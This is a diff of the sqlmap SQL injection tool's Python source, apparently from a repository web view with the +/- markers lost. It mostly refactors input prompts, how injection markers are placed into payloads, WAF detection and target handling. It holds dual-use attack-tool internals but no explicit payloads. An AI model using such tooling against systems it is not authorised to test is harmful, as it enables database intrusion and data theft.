message = "do you want to skip those kind of cases (and save scanning time)? %s " % ("[Y/n]" if conf.multipleTargets else "[y/N]")
kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N').upper() != 'N'
kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N', boolean=True)
elif result:
infoMsg += "be injectable"
@@ -1017,7 +1036,7 @@ def heuristicCheckSqlInjection(place, parameter):
value = "%s%s%s" % (randStr1, DUMMY_NON_SQLI_CHECK_APPENDIX, randStr2)
payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
@@ -1126,7 +1145,7 @@ def checkDynamicContent(firstPage, secondPage):
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)
secondPage, _ = Request.queryPage(content=True)
secondPage, _, _ = Request.queryPage(content=True)
findDynamicContent(firstPage, secondPage)
def checkStability():
@@ -1149,7 +1168,7 @@ def checkStability():
delay = max(0, min(1, delay))
time.sleep(delay)
secondPage, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
secondPage, _, _ = Request.queryPage(content=True, noteResponseTime=False, raise404=False)
if kb.redirectChoice:
return None
@@ -1177,19 +1196,19 @@ def checkStability():
logger.warn(warnMsg)
message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
test = readInput(message, default="C")
choice = readInput(message, default='C').upper()
if test and test[0] in ("q", "Q"):
if choice == 'Q':
raise SqlmapUserQuitException
elif test and test[0] in ("s", "S"):
elif choice == 'S':
showStaticWords(firstPage, secondPage)
message = "please enter value for parameter 'string': "
test = readInput(message)
string = readInput(message)
if test:
conf.string = test
if string:
conf.string = string
if kb.nullConnection:
debugMsg = "turning off NULL connection "
@@ -1201,12 +1220,12 @@ def checkStability():
errMsg = "Empty value supplied"
raise SqlmapNoneDataException(errMsg)
elif test and test[0] in ("r", "R"):
elif choice == 'R':
message = "please enter value for parameter 'regex': "
test = readInput(message)
regex = readInput(message)
if test:
conf.regex = test
if regex:
conf.regex = regex
if kb.nullConnection:
debugMsg = "turning off NULL connection "
@@ -1231,7 +1250,7 @@ def checkString():
infoMsg += "target URL page content"
logger.info(infoMsg)
page, headers = Request.queryPage(content=True)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if conf.string not in rawResponse:
@@ -1250,7 +1269,7 @@ def checkRegexp():
infoMsg += "the target URL page content"
logger.info(infoMsg)
page, headers = Request.queryPage(content=True)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if not re.search(conf.regexp, rawResponse, re.I | re.M):
@@ -1278,6 +1297,9 @@ def checkWaf():
logger.critical(warnMsg)
return _
if not kb.originalPage:
return None
infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS"
logger.info(infoMsg)
@@ -1307,9 +1329,8 @@ def checkWaf():
if not conf.identifyWaf:
message = "do you want sqlmap to try to detect backend "
message += "WAF/IPS/IDS? [y/N] "
output = readInput(message, default="N")
if output and output[0] in ("Y", "y"):
if readInput(message, default='N', boolean=True):
conf.identifyWaf = True
if conf.timeout == defaults.timeout:
@@ -1370,15 +1391,27 @@ def identifyWaf():
retVal.append(product)
if retVal:
if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
os.close(handle)
with openFile(filename, "w+b") as f:
f.write(kb.wafSpecificResponse)
message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
message += "If you know the details on used protection please "
message += "report it along with specific response "
message += "to 'dev@sqlmap.org'"
logger.warn(message)
message = "are you sure that you want to "
message += "continue with further target testing? [y/N] "
output = readInput(message, default="N")
choice = readInput(message, default='N', boolean=True)
if not conf.tamper:
warnMsg = "please consider usage of tamper scripts (option '--tamper')"
singleTimeWarnMessage(warnMsg)
if output and output[0] not in ("Y", "y"):
if not choice:
raise SqlmapUserQuitException
else:
warnMsg = "WAF/IPS/IDS product hasn't been identified"
@@ -1458,7 +1491,7 @@ def checkConnection(suppressOutput=False):
try:
kb.originalPageTime = time.time()
page, headers = Request.queryPage(content=True, noteResponseTime=False)
page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)
kb.originalPage = kb.pageTemplate = page
kb.errorIsNone = False
@@ -1494,7 +1527,7 @@ def checkConnection(suppressOutput=False):
return False
msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] "
if readInput(msg, default="Y") not in ("n", "N"):
if readInput(msg, default='Y', boolean=True):
raise SqlmapSilentQuitException
else:
kb.ignoreNotFound = True
@@ -1503,6 +1536,10 @@ def checkConnection(suppressOutput=False):
return True
def checkInternet():
content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0]
return CHECK_INTERNET_VALUE in (content or "")
def setVerbosity(): # Cross-linked function
raise NotImplementedError

77
lib/controller/controller.py
View File

@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
import os
import re
import time
from lib.controller.action import action
from lib.controller.checks import checkSqlInjection
@@ -15,6 +16,7 @@ from lib.controller.checks import checkStability
from lib.controller.checks import checkString
from lib.controller.checks import checkRegexp
from lib.controller.checks import checkConnection
from lib.controller.checks import checkInternet
from lib.controller.checks import checkNullConnection
from lib.controller.checks import checkWaf
from lib.controller.checks import heuristicCheckSqlInjection
@@ -52,6 +54,7 @@ from lib.core.exception import SqlmapBaseException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSkipTargetException
from lib.core.exception import SqlmapValueException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import ASP_NET_CONTROL_REGEX
@@ -116,11 +119,11 @@ def _selectInjection():
message += "\n"
message += "[q] Quit"
select = readInput(message, default="0")
choice = readInput(message, default='0').upper()
if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0:
index = int(select)
elif select[0] in ("Q", "q"):
if choice.isdigit() and int(choice) < len(kb.injections) and int(choice) >= 0:
index = int(choice)
elif choice == 'Q':
raise SqlmapUserQuitException
else:
errMsg = "invalid choice"
@@ -140,7 +143,7 @@ def _formatInjection(inj):
if inj.place == PLACE.CUSTOM_HEADER:
payload = payload.split(',', 1)[1]
if stype == PAYLOAD.TECHNIQUE.UNION:
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
count = re.sub(r"(?i)(\(.+\))|(\blimit[^a-z]+)", "", sdata.payload).count(',') + 1
title = re.sub(r"\d+ to \d+", str(count), title)
vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
if count == 1:
@@ -161,7 +164,7 @@ def _showInjections():
else:
header = "sqlmap resumed the following injection point(s) from stored session"
if hasattr(conf, "api"):
if conf.api:
conf.dumper.string("", {"url": conf.url, "query": conf.parameters.get(PLACE.GET), "data": conf.parameters.get(PLACE.POST)}, content_type=CONTENT_TYPE.TARGET)
conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
else:
@@ -183,8 +186,8 @@ def _randomFillBlankFields(value):
if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value):
message = "do you want to fill blank fields with random values? [Y/n] "
test = readInput(message, default="Y")
if not test or test[0] in ("y", "Y"):
if readInput(message, default='Y', boolean=True):
for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal):
item = match.group("result")
if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item):
@@ -276,6 +279,21 @@ def start():
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
try:
if conf.checkInternet:
infoMsg = "[INFO] checking for Internet connection"
logger.info(infoMsg)
if not checkInternet():
warnMsg = "[%s] [WARNING] no connection detected" % time.strftime("%X")
dataToStdout(warnMsg)
while not checkInternet():
dataToStdout('.')
time.sleep(5)
dataToStdout("\n")
conf.url = targetUrl
conf.method = targetMethod.upper() if targetMethod else targetMethod
conf.data = targetData
@@ -305,7 +323,9 @@ def start():
message = "SQL injection vulnerability has already been detected "
message += "against '%s'. Do you want to skip " % conf.hostname
message += "further tests involving it? [Y/n]"
kb.skipVulnHost = readInput(message, default="Y").upper() != 'N'
kb.skipVulnHost = readInput(message, default='Y', boolean=True)
testSqlInj = not kb.skipVulnHost
if not testSqlInj:
@@ -332,9 +352,13 @@ def start():
continue
message += "\ndo you want to test this form? [Y/n/q] "
test = readInput(message, default="Y")
choice = readInput(message, default='Y').upper()
if not test or test[0] in ("y", "Y"):
if choice == 'N':
continue
elif choice == 'Q':
break
else:
if conf.method != HTTPMETHOD.GET:
message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
conf.data = readInput(message, default=conf.data)
@@ -352,21 +376,14 @@ def start():
parseTargetUrl()
elif test[0] in ("n", "N"):
continue
elif test[0] in ("q", "Q"):
break
else:
message += "\ndo you want to test this URL? [Y/n/q]"
test = readInput(message, default="Y")
choice = readInput(message, default='Y').upper()
if not test or test[0] in ("y", "Y"):
pass
elif test[0] in ("n", "N"):
if choice == 'N':
dataToStdout(os.linesep)
continue
elif test[0] in ("q", "Q"):
elif choice == 'Q':
break
infoMsg = "testing URL '%s'" % targetUrl
@@ -543,9 +560,8 @@ def start():
msg = "%s parameter '%s' " % (injection.place, injection.parameter)
msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
test = readInput(msg, default="N")
if test[0] not in ("y", "Y"):
if not readInput(msg, default='N', boolean=True):
proceed = False
paramKey = (conf.hostname, conf.path, None, None)
kb.testedParams.add(paramKey)
@@ -629,9 +645,7 @@ def start():
if kb.injection.place is not None and kb.injection.parameter is not None:
if conf.multipleTargets:
message = "do you want to exploit this SQL injection? [Y/n] "
exploit = readInput(message, default="Y")
condition = not exploit or exploit[0] in ("y", "Y")
condition = readInput(message, default='Y', boolean=True)
else:
condition = True
@@ -644,17 +658,18 @@ def start():
logger.warn(warnMsg)
message = "do you want to skip to the next target in list? [Y/n/q]"
test = readInput(message, default="Y")
choice = readInput(message, default='Y').upper()
if not test or test[0] in ("y", "Y"):
pass
elif test[0] in ("n", "N"):
if choice == 'N':
return False
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
raise
except SqlmapSkipTargetException:
pass
except SqlmapUserQuitException:
raise

3
lib/controller/handler.py
View File

@@ -8,7 +8,6 @@ See the file 'doc/COPYING' for copying permission
from lib.core.common import Backend
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.dicts import DBMS_DICT
from lib.core.enums import DBMS
from lib.core.settings import MSSQL_ALIASES
@@ -71,7 +70,7 @@ def setHandler():
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
if _:
items.remove(_)
items.insert(0, _)

30
lib/core/agent.py
View File

@@ -36,7 +36,6 @@ from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
@@ -63,7 +62,7 @@ class Agent(object):
if Backend.getIdentifiedDbms() in (DBMS.ORACLE,): # non-standard object(s) make problems to a database connector while returned (e.g. XMLTYPE)
_, _, _, _, _, _, fieldsToCastStr, _ = self.getFields(query)
for field in fieldsToCastStr.split(","):
for field in fieldsToCastStr.split(','):
query = query.replace(field, self.nullAndCastField(field))
if kb.tamperFunctions:
@@ -101,7 +100,7 @@ class Agent(object):
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
paramString = origValue
if place == PLACE.URI:
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue.split(kb.customInjectionMark)[0]
else:
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
origValue = origValue[origValue.rfind('/') + 1:]
@@ -110,7 +109,7 @@ class Agent(object):
origValue = origValue[origValue.rfind(char) + 1:]
elif place == PLACE.CUSTOM_POST:
paramString = origValue
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue.split(kb.customInjectionMark)[0]
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
origValue = origValue.split('>')[-1]
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
@@ -120,7 +119,7 @@ class Agent(object):
origValue = _.split('=', 1)[1] if '=' in _ else ""
elif place == PLACE.CUSTOM_HEADER:
paramString = origValue
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
origValue = origValue.split(kb.customInjectionMark)[0]
origValue = origValue[origValue.find(',') + 1:]
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
if match:
@@ -131,6 +130,8 @@ class Agent(object):
if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
origValue = origValue.split(' ')[-1].split(':')[-1]
origValue = origValue or ""
if value is None:
if where == PAYLOAD.WHERE.ORIGINAL:
value = origValue
@@ -159,14 +160,14 @@ class Agent(object):
newValue = self.cleanupPayload(newValue, origValue)
if place in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
_ = "%s%s" % (origValue, CUSTOM_INJECTION_MARK_CHAR)
_ = "%s%s" % (origValue, kb.customInjectionMark)
if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and not '"%s"' % _ in paramString:
newValue = '"%s"' % newValue
elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and not "'%s'" % _ in paramString:
newValue = "'%s'" % newValue
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
newValue = newValue.replace(kb.customInjectionMark, REPLACEMENT_MARKER)
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
retVal = retVal.replace(kb.customInjectionMark, "").replace(REPLACEMENT_MARKER, kb.customInjectionMark)
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue)))
@@ -296,7 +297,7 @@ class Agent(object):
elif suffix and not comment:
expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER)
return re.sub(r"(?s);\W*;", ";", expression)
return re.sub(r";\W*;", ";", expression)
def cleanupPayload(self, payload, origValue=None):
if payload is None:
@@ -316,6 +317,7 @@ class Agent(object):
payload = payload.replace(_, randomStr())
if origValue is not None and "[ORIGVALUE]" in payload:
origValue = getUnicode(origValue)
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
if "[INFERENCE]" in payload:
@@ -346,6 +348,12 @@ class Agent(object):
if payload:
payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, str(randomInt()))
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, randomStr())
return payload
def getComment(self, request):
@@ -452,7 +460,7 @@ class Agent(object):
@rtype: C{str}
"""
if not Backend.getDbms():
if not Backend.getIdentifiedDbms():
return fields
if fields.startswith("(CASE") or fields.startswith("(IIF") or fields.startswith("SUBSTR") or fields.startswith("MID(") or re.search(r"\A'[^']+'\Z", fields):
@@ -857,7 +865,7 @@ class Agent(object):
if expression.find(queries[Backend.getIdentifiedDbms()].limitstring.query) > 0:
_ = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
else:
_ = expression.index("LIMIT ")
_ = re.search(r"\bLIMIT\b", expression, re.I).start()
expression = expression[:_]
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):

253
lib/core/common.py
View File

@@ -26,6 +26,7 @@ import string
import subprocess
import sys
import tempfile
import threading
import time
import urllib
import urllib2
@@ -72,6 +73,7 @@ from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import MKSTEMP_PREFIX
from lib.core.enums import OPTION_TYPE
from lib.core.enums import OS
from lib.core.enums import PLACE
from lib.core.enums import PAYLOAD
@@ -95,8 +97,8 @@ from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_DIRECTORY_DICT
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
@@ -112,6 +114,7 @@ from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
from lib.core.settings import HASHDB_MILESTONE_VALUE
from lib.core.settings import HOST_ALIASES
from lib.core.settings import IGNORE_SAVE_OPTIONS
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT
from lib.core.settings import IP_ADDRESS_REGEX
@@ -137,6 +140,7 @@ from lib.core.settings import REFERER_ALIASES
from lib.core.settings import REFLECTED_BORDER_REGEX
from lib.core.settings import REFLECTED_MAX_REGEX_PARTS
from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
from lib.core.settings import REFLECTED_REPLACEMENT_TIMEOUT
from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
from lib.core.settings import SENSITIVE_DATA_REGEX
@@ -268,7 +272,7 @@ class Format(object):
infoApi = {}
if info and "type" in info:
if hasattr(conf, "api"):
if conf.api:
infoApi["%s operating system" % target] = info
else:
infoStr += "%s operating system: %s" % (target, Format.humanize(info["type"]))
@@ -286,12 +290,12 @@ class Format(object):
infoStr += " (%s)" % Format.humanize(info["codename"])
if "technology" in info:
if hasattr(conf, "api"):
if conf.api:
infoApi["web application technology"] = Format.humanize(info["technology"], ", ")
else:
infoStr += "\nweb application technology: %s" % Format.humanize(info["technology"], ", ")
if hasattr(conf, "api"):
if conf.api:
return infoApi
else:
return infoStr.lstrip()
@@ -318,14 +322,14 @@ class Backend:
msg += "correct [%s (default)/%s] " % (kb.dbms, dbms)
while True:
_ = readInput(msg, default=kb.dbms)
choice = readInput(msg, default=kb.dbms)
if aliasToDbmsEnum(_) == kb.dbms:
if aliasToDbmsEnum(choice) == kb.dbms:
kb.dbmsVersion = []
kb.resolutionDbms = kb.dbms
break
elif aliasToDbmsEnum(_) == dbms:
kb.dbms = aliasToDbmsEnum(_)
elif aliasToDbmsEnum(choice) == dbms:
kb.dbms = aliasToDbmsEnum(choice)
break
else:
warnMsg = "invalid value"
@@ -378,12 +382,12 @@ class Backend:
msg += "correct [%s (default)/%s] " % (kb.os, os)
while True:
_ = readInput(msg, default=kb.os)
choice = readInput(msg, default=kb.os)
if _ == kb.os:
if choice == kb.os:
break
elif _ == os:
kb.os = _.capitalize()
elif choice == os:
kb.os = choice.capitalize()
break
else:
warnMsg = "invalid value"
@@ -417,10 +421,10 @@ class Backend:
msg += "\n[2] 64-bit"
while True:
_ = readInput(msg, default='1')
choice = readInput(msg, default='1')
if isinstance(_, basestring) and _.isdigit() and int(_) in (1, 2):
kb.arch = 32 if int(_) == 1 else 64
if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2):
kb.arch = 32 if int(choice) == 1 else 64
break
else:
warnMsg = "invalid value. Valid values are 1 and 2"
@@ -597,8 +601,8 @@ def paramToDict(place, parameters=None):
logger.warn(warnMsg)
message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] "
test = readInput(message, default="N")
if test[0] not in ("y", "Y"):
if not readInput(message, default='N', boolean=True):
raise SqlmapSilentQuitException
elif not _:
warnMsg = "provided value for parameter '%s' is empty. " % parameter
@@ -640,8 +644,8 @@ def paramToDict(place, parameters=None):
if candidates:
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
message += "is JSON deserializable. Do you want to inject inside? [y/N] "
test = readInput(message, default="N")
if test[0] in ("y", "Y"):
if not readInput(message, default='N', boolean=True):
del testableParameters[parameter]
testableParameters.update(candidates)
break
@@ -650,11 +654,11 @@ def paramToDict(place, parameters=None):
except Exception:
pass
_ = re.sub(regex, "\g<1>%s\g<%d>" % (CUSTOM_INJECTION_MARK_CHAR, len(match.groups())), testableParameters[parameter])
_ = re.sub(regex, "\g<1>%s\g<%d>" % (kb.customInjectionMark, len(match.groups())), testableParameters[parameter])
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % _
test = readInput(message, default="N")
if test[0] in ("y", "Y"):
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % getUnicode(_)
if readInput(message, default='N', boolean=True):
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
break
@@ -750,17 +754,17 @@ def getManualDirectories():
message += "[2] custom location(s)\n"
message += "[3] custom directory list file\n"
message += "[4] brute force search"
choice = readInput(message, default="1").strip()
choice = readInput(message, default='1')
if choice == "2":
if choice == '2':
message = "please provide a comma separate list of absolute directory paths: "
directories = readInput(message, default="").split(',')
elif choice == "3":
elif choice == '3':
message = "what's the list file location?\n"
listPath = readInput(message, default="")
checkFile(listPath)
directories = getFileItems(listPath)
elif choice == "4":
elif choice == '4':
targets = set([conf.hostname])
_ = conf.hostname.split('.')
@@ -894,7 +898,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=
message = data
try:
if hasattr(conf, "api"):
if conf.get("api"):
sys.stdout.write(message, status, content_type)
else:
sys.stdout.write(setColor(message, bold))
@@ -961,7 +965,7 @@ def dataToOutFile(filename, data):
return retVal
def readInput(message, default=None, checkBatch=True):
def readInput(message, default=None, checkBatch=True, boolean=False):
"""
Reads input from terminal
"""
@@ -998,7 +1002,7 @@ def readInput(message, default=None, checkBatch=True):
if retVal is None:
if checkBatch and conf.get("batch"):
if isListLike(default):
options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
options = ','.join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
elif default:
options = getUnicode(default, UNICODE_ENCODING)
else:
@@ -1034,6 +1038,12 @@ def readInput(message, default=None, checkBatch=True):
finally:
logging._releaseLock()
if retVal and default and isinstance(default, basestring) and len(default) == 1:
retVal = retVal.strip()
if boolean:
retVal = retVal.strip().upper() == 'Y'
return retVal
def randomRange(start=0, stop=1000, seed=None):
@@ -1108,6 +1118,13 @@ def sanitizeStr(value):
return getUnicode(value).replace("\n", " ").replace("\r", "")
def getHeader(headers, key):
"""
Returns header value ignoring the letter case
>>> getHeader({"Foo": "bar"}, "foo")
'bar'
"""
retVal = None
for _ in (headers or {}):
if _.upper() == key.upper():
@@ -1145,7 +1162,7 @@ def banner():
This function prints sqlmap banner with its version
"""
if not any(_ in sys.argv for _ in ("--version", "--pickled-options")):
if not any(_ in sys.argv for _ in ("--version", "--api")):
_ = BANNER
if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv:
@@ -1186,8 +1203,7 @@ def cleanQuery(query):
for sqlStatements in SQL_STATEMENTS.values():
for sqlStatement in sqlStatements:
sqlStatementEsc = sqlStatement.replace("(", "\\(")
queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I)
queryMatch = re.search("(?i)\b(%s)\b" % sqlStatement.replace("(", "").replace(")", "").strip(), query)
if queryMatch and "sys_exec" not in query:
retVal = retVal.replace(queryMatch.group(1), sqlStatement.upper())
@@ -1263,6 +1279,8 @@ def parseTargetDirect():
if not conf.direct:
return
conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters
details = None
remote = False
@@ -1279,8 +1297,8 @@ def parseTargetDirect():
if conf.dbmsCred:
conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':')
else:
conf.dbmsUser = unicode()
conf.dbmsPass = unicode()
conf.dbmsUser = ""
conf.dbmsPass = ""
if not conf.dbmsPass:
conf.dbmsPass = None
@@ -1376,7 +1394,7 @@ def parseTargetUrl():
else:
conf.url = "http://" + conf.url
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
if kb.customInjectionMark in conf.url:
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
try:
@@ -1394,7 +1412,7 @@ def parseTargetUrl():
conf.hostname = hostnamePort[0].strip()
conf.ipv6 = conf.hostname != conf.hostname.strip("[]")
conf.hostname = conf.hostname.strip("[]").replace(CUSTOM_INJECTION_MARK_CHAR, "")
conf.hostname = conf.hostname.strip("[]").replace(kb.customInjectionMark, "")
try:
_ = conf.hostname.encode("idna")
@@ -1418,7 +1436,7 @@ def parseTargetUrl():
else:
conf.port = 80
if conf.port < 0 or conf.port > 65535:
if conf.port < 1 or conf.port > 65535:
errMsg = "invalid target URL's port (%d)" % conf.port
raise SqlmapSyntaxException(errMsg)
@@ -1434,13 +1452,13 @@ def parseTargetUrl():
if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3):
debugMsg = "setting the HTTP Referer header to the target URL"
logger.debug(debugMsg)
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "")))
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.REFERER]
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(kb.customInjectionMark, "")))
if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
debugMsg = "setting the HTTP Host header to the target URL"
logger.debug(debugMsg)
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.HOST]
conf.httpHeaders.append((HTTP_HEADER.HOST, getHostHeader(conf.url)))
if conf.url != originalUrl:
@@ -1608,6 +1626,13 @@ def getRemoteIP():
return retVal
def getFileType(filePath):
"""
Returns "magic" file type for given file path
>>> getFileType(__file__)
'text'
"""
try:
_ = magic.from_file(filePath)
except:
@@ -1957,10 +1982,10 @@ def getSQLSnippet(dbms, sfile, **variables):
retVal = readCachedFileContent(filename)
retVal = re.sub(r"#.+", "", retVal)
retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n")
retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n")
for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
retVal = re.sub(r"%%%s%%" % _, variables[_].replace('\\', r'\\'), retVal)
for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
retVal = retVal.replace(_, randomStr())
@@ -1975,9 +2000,8 @@ def getSQLSnippet(dbms, sfile, **variables):
logger.error(errMsg)
msg = "do you want to provide the substitution values? [y/N] "
choice = readInput(msg, default="N")
if choice and choice[0].lower() == "y":
if readInput(msg, default='N', boolean=True):
for var in variables:
msg = "insert value for variable '%s': " % var
val = readInput(msg, default="")
@@ -2366,8 +2390,8 @@ def wasLastResponseDelayed():
if kb.adjustTimeDelay is None:
msg = "do you want sqlmap to try to optimize value(s) "
msg += "for DBMS delay responses (option '--time-sec')? [Y/n] "
choice = readInput(msg, default='Y')
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if not readInput(msg, default='Y', boolean=True) else ADJUST_TIME_DELAY.YES
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)
@@ -2535,7 +2559,7 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
# corner case when character % really needs to be
# encoded (when not representing URL encoded char)
# except in cases when tampering scripts are used
if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions:
if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions:
value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value)
while True:
